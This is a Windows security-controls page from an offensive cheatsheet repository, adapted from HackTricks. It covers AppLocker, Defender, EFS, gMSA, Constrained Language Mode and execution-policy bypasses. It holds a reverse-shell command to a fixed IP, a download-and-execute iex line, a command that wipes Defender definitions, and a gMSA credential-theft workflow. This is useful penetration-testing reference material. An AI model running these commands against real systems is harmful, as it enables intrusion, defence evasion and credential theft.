daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

overview.md (18573B)


      1 ---
      2 title: "Windows Security Controls"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/authentication-credentials-uac-and-efs/README.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/authentication-credentials-uac-and-efs/README.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: true
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Windows Security Controls
     14 
     15 ## AppLocker Policy
     16 
     17 An application whitelist is a list of approved software applications or executables that are allowed to be present and run on a system. The goal is to protect the environment from harmful malware and unapproved software that does not align with the specific business needs of an organization.
     18 
     19 [AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) is Microsoft's **application whitelisting solution** and gives system administrators control over **which applications and files users can run**. It provides **granular control** over executables, scripts, Windows installer files, DLLs, packaged apps, and packed app installers.\
     20 It is common for organizations to **block cmd.exe and PowerShell.exe** and write access to certain directories, **but this can all be bypassed**.
     21 
     22 ### Check
     23 
     24 Check which files/extensions are blacklisted/whitelisted:
     25 
     26 ```bash
     27 Get-ApplockerPolicy -Effective -xml
     28 
     29 Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
     30 
     31 $a = Get-ApplockerPolicy -effective
     32 $a.rulecollections
     33 ```
     34 
     35 This registry path contains the configurations and policies applied by AppLocker, providing a way to review the current set of rules enforced on the system:
     36 
     37 - `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
     38 
     39 ### Bypass
     40 
     41 - Useful **Writable folders** to bypass AppLocker Policy: If AppLocker is allowing to execute anything inside `C:\Windows\System32` or `C:\Windows` there are **writable folders** you can use to **bypass this**.
     42 
     43 ```text
     44 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
     45 C:\Windows\System32\spool\drivers\color
     46 C:\Windows\Tasks
     47 C:\windows\tracing
     48 ```
     49 
     50 - Commonly **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker.
     51 - **Poorly written rules could also be bypassed**
     52   - For example, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, you can create a **folder called `allowed`** anywhere and it will be allowed.
     53   - Organizations also often focus on **blocking the `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, but forget about the **other** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) such as `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` or `PowerShell_ISE.exe`.
     54 - **DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using **DLLs as backdoors will help bypassing AppLocker**.
     55 - You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).<sup>[[4]](#references)</sup>
     56 
     57 ## Credentials Storage
     58 
     59 ### Security Accounts Manager (SAM)
     60 
     61 Local credentials are present in this file, the passwords are hashed.
     62 
     63 ### Local Security Authority (LSA) - LSASS
     64 
     65 The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\
     66 **LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
     67 LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user.
     68 
     69 The **credentials** are **saved** inside the **process LSASS**: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
     70 
     71 ### LSA secrets
     72 
     73 LSA could save in disk some credentials:
     74 
     75 - Password of the computer account of the Active Directory (unreachable domain controller).
     76 - Passwords of the accounts of Windows services
     77 - Passwords for scheduled tasks
     78 - More (password of IIS applications...)
     79 
     80 ### NTDS.dit
     81 
     82 It is the database of the Active Directory. It is only present in Domain Controllers.
     83 
     84 ## Defender
     85 
     86 [**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) is an Antivirus that is available in Windows 10 and Windows 11, and in versions of Windows Server. It **blocks** common pentesting tools such as **`WinPEAS`**. However, there are ways to **bypass these protections**.
     87 
     88 ### Check
     89 
     90 To check the **status** of **Defender** you can execute the PS cmdlet **`Get-MpComputerStatus`** (check the value of **`RealTimeProtectionEnabled`** to know if it's active):
     91 
     92 <pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
     93 
     94 [...]
     95 AntispywareEnabled              : True
     96 AntispywareSignatureAge         : 1
     97 AntispywareSignatureLastUpdated : 12/6/2021 10:14:23 AM
     98 AntispywareSignatureVersion     : 1.323.392.0
     99 AntivirusEnabled                : True
    100 [...]
    101 NISEnabled                      : False
    102 NISEngineVersion                : 0.0.0.0
    103 [...]
    104 <strong>RealTimeProtectionEnabled       : True
    105 </strong>RealTimeScanDirection           : 0
    106 PSComputerName                  :
    107 </code></pre>
    108 
    109 To enumerate it you could also run:
    110 
    111 ```bash
    112 WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    113 wmic /namespace:\\root\securitycenter2 path antivirusproduct
    114 sc query windefend
    115 
    116 #Delete all rules of Defender (useful for machines without internet access)
    117 "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    118 ```
    119 
    120 ## Encrypted File System (EFS)
    121 
    122 EFS secures files through encryption, utilizing a **symmetric key** known as the **File Encryption Key (FEK)**. This key is encrypted with the user's **public key** and stored within the encrypted file's $EFS **alternative data stream**. When decryption is needed, the corresponding **private key** of the user's digital certificate is used to decrypt the FEK from the $EFS stream. More details can be found [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
    123 
    124 **Decryption scenarios without user initiation** include:
    125 
    126 - When files or folders are moved to a non-EFS file system, like [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), they are automatically decrypted.
    127 - Encrypted files sent over the network via SMB/CIFS protocol are decrypted prior to transmission.
    128 
    129 This encryption method allows **transparent access** to encrypted files for the owner. However, simply changing the owner's password and logging in will not permit decryption.
    130 
    131 **Key Takeaways**:
    132 
    133 - EFS uses a symmetric FEK, encrypted with the user's public key.
    134 - Decryption employs the user's private key to access the FEK.
    135 - Automatic decryption occurs under specific conditions, like copying to FAT32 or network transmission.
    136 - Encrypted files are accessible to the owner without additional steps.
    137 
    138 ### Check EFS info
    139 
    140 Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
    141 
    142 Check **who** has **access** to the file using cipher /c \<file>\
    143 You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
    144 
    145 ### Decrypting EFS files
    146 
    147 #### Being Authority System
    148 
    149 This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user.
    150 
    151 #### Knowing the user's password
    152 
    153 Mimikatz documents how to import the user's certificate/private key material and decrypt EFS-protected files when the password is known.<sup>[[6]](#references)</sup>
    154 
    155 ## Group Managed Service Accounts (gMSA)
    156 
    157 Microsoft developed **Group Managed Service Accounts (gMSA)** to simplify the management of service accounts in IT infrastructures. Unlike traditional service accounts that often have the "**Password never expire**" setting enabled, gMSAs offer a more secure and manageable solution:
    158 
    159 - **Automatic Password Management**: gMSAs use a complex, 240-character password that automatically changes according to domain or computer policy. This process is handled by Microsoft's Key Distribution Service (KDC), eliminating the need for manual password updates.
    160 - **Enhanced Security**: These accounts are immune to lockouts and cannot be used for interactive logins, enhancing their security.
    161 - **Multiple Host Support**: gMSAs can be shared across multiple hosts, making them ideal for services running on multiple servers.
    162 - **Scheduled Task Capability**: Unlike managed service accounts, gMSAs support running scheduled tasks.
    163 - **Simplified SPN Management**: The system automatically updates the Service Principal Name (SPN) when there are changes to the computer's sAMaccount details or DNS name, simplifying SPN management.
    164 
    165 The passwords for gMSAs are stored in the LDAP property _**msDS-ManagedPassword**_ and are automatically reset every 30 days by Domain Controllers (DCs). This password, an encrypted data blob known as [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), can only be retrieved by authorized administrators and the servers on which the gMSAs are installed, ensuring a secure environment. To access this information, a secured connection such as LDAPS is required, or the connection must be authenticated with 'Sealing & Secure'.
    166 
    167 ![Relaying NTLM authentication to retrieve a gMSA password](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/asd1.png)<sup>[[1]](#references)</sup>
    168 
    169 You can read this password with [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**<sup>[[2]](#references)</sup>
    170 
    171 ```text
    172 /GMSAPasswordReader --AccountName jkohler
    173 ```
    174 
    175 [**Find more information in the archived original research**](https://web.archive.org/web/20200724233424/https://cube0x0.github.io/Relaying-for-gMSA/).<sup>[[1]](#references)</sup>
    176 
    177 The same research explains how an **NTLM relay attack** can obtain a **gMSA password** when the relayed principal is authorized to read `msDS-ManagedPassword`.<sup>[[1]](#references)</sup>
    178 
    179 ### Abusing ACL chaining to read gMSA managed password (GenericAll -> ReadGMSAPassword)
    180 
    181 In many environments, low-privileged users can pivot to gMSA secrets without DC compromise by abusing misconfigured object ACLs:<sup>[[3]](#references)</sup>
    182 
    183 - A group you can control (e.g., via GenericAll/GenericWrite) is granted `ReadGMSAPassword` over a gMSA.
    184 - By adding yourself to that group, you inherit the right to read the gMSA’s `msDS-ManagedPassword` blob over LDAP and derive usable NTLM credentials.
    185 
    186 Typical workflow:
    187 
    188 1) Discover the path with BloodHound and mark your foothold principals as Owned. Look for edges like:
    189    - GroupA GenericAll -> GroupB; GroupB ReadGMSAPassword -> gMSA
    190 
    191 2) Add yourself to the intermediate group you control (example with bloodyAD):
    192 
    193 ```bash
    194 bloodyAD --host <DC.FQDN> -d <domain> -u <user> -p <pass> add groupMember <GroupWithReadGmsa> <user>
    195 ```
    196 
    197 3) Read the gMSA managed password via LDAP and derive the NTLM hash. NetExec automates the extraction of `msDS-ManagedPassword` and conversion to NTLM:
    198 
    199 ```bash
    200 # Shows PrincipalsAllowedToReadPassword and computes NTLM automatically
    201 netexec ldap <DC.FQDN> -u <user> -p <pass> --gmsa
    202 # Account: mgtsvc$  NTLM: edac7f05cded0b410232b7466ec47d6f
    203 ```
    204 
    205 4) Authenticate as the gMSA using the NTLM hash (no plaintext needed). If the account is in Remote Management Users, WinRM will work directly:
    206 
    207 ```bash
    208 # SMB / WinRM as the gMSA using the NT hash
    209 netexec smb   <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
    210 netexec winrm <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
    211 ```
    212 
    213 Notes:
    214 - LDAP reads of `msDS-ManagedPassword` require sealing (e.g., LDAPS/sign+seal). Tools handle this automatically.
    215 - gMSAs are often granted local rights like WinRM; validate group membership (e.g., Remote Management Users) to plan lateral movement.
    216 - If you only need the blob to compute the NTLM yourself, see MSDS-MANAGEDPASSWORD_BLOB structure.
    217 
    218 
    219 ## LAPS
    220 
    221 The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), enables the management of local Administrator passwords. These passwords, which are **randomized**, unique, and **regularly changed**, are stored centrally in Active Directory. Access to these passwords is restricted through ACLs to authorized users. With sufficient permissions granted, the ability to read local admin passwords is provided.
    222 
    223 
    224 [Laps](/hacktricks/windows-hardening/active-directory-methodology/laps)
    225 
    226 ## PS Constrained Language Mode
    227 
    228 PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **locks down many of the features** needed to use PowerShell effectively, such as blocking COM objects, only allowing approved .NET types, XAML-based workflows, PowerShell classes, and more.
    229 
    230 ### **Check**
    231 
    232 ```bash
    233 $ExecutionContext.SessionState.LanguageMode
    234 #Values could be: FullLanguage or ConstrainedLanguage
    235 ```
    236 
    237 ### Bypass
    238 
    239 ```bash
    240 #Easy bypass
    241 Powershell -version 2
    242 ```
    243 
    244 On current Windows versions that bypass no longer works, but you can use [**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
    245 **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**.
    246 
    247 #### Direct bypass:
    248 
    249 ```bash
    250 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
    251 ```
    252 
    253 #### Reverse shell:
    254 
    255 ```bash
    256 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
    257 ```
    258 
    259 You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).<sup>[[4]](#references)</sup>
    260 
    261 ## PS Execution Policy
    262 
    263 By default it is set to **restricted.** Main ways to bypass this policy:
    264 
    265 ```bash
    266 1º Just copy and paste inside the interactive PS console
    267 2º Read en Exec
    268 Get-Content .runme.ps1 | PowerShell.exe -noprofile -
    269 3º Read and Exec
    270 Get-Content .runme.ps1 | Invoke-Expression
    271 4º Use other execution policy
    272 PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
    273 5º Change users execution policy
    274 Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
    275 6º Change execution policy for this session
    276 Set-ExecutionPolicy Bypass -Scope Process
    277 7º Download and execute:
    278 powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
    279 8º Use command switch
    280 Powershell -command "Write-Host 'My voice is my passport, verify me.'"
    281 9º Use EncodeCommand
    282 $command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
    283 ```
    284 
    285 More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)<sup>[[5]](#references)</sup>
    286 
    287 ## Security Support Provider Interface (SSPI)
    288 
    289 Is the API that can be use to authenticate users.
    290 
    291 SSPI selects an appropriate authentication protocol for two communicating machines, preferring Kerberos when available. These protocols are implemented by Security Support Providers (SSPs), which are installed as DLLs on Windows; both peers must support the negotiated provider.
    292 
    293 ### Main SSPs
    294 
    295 - **Kerberos**: The preferred one
    296   - %windir%\Windows\System32\kerberos.dll
    297 - **NTLMv1** and **NTLMv2**: Compatibility reasons
    298   - %windir%\Windows\System32\msv1_0.dll
    299 - **Digest**: Web servers and LDAP, password in form of a MD5 hash
    300   - %windir%\Windows\System32\Wdigest.dll
    301 - **Schannel**: SSL and TLS
    302   - %windir%\Windows\System32\Schannel.dll
    303 - **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one)
    304   - %windir%\Windows\System32\lsasrv.dll
    305 
    306 #### The negotiation could offer several methods or only one.
    307 
    308 ## UAC - User Account Control
    309 
    310 [User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**.
    311 
    312 
    313 [Uac User Account Control](/hacktricks/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control)
    314 
    315 ## References
    316 
    317 - [1] [Relaying for gMSA – cube0x0 (Internet Archive)](https://web.archive.org/web/20200724233424/https://cube0x0.github.io/Relaying-for-gMSA/)
    318 - [2] [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader)
    319 - [3] [HTB Sendai – 0xdf: gMSA via rights chaining to WinRM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
    320 - [4] [darthsidious – Bypassing AppLocker and PowerShell Constrained Language Mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)
    321 - [5] [NetSPI – 15 Ways to Bypass the PowerShell Execution Policy](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
    322 - [6] [howto ~ decrypt EFS files](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files)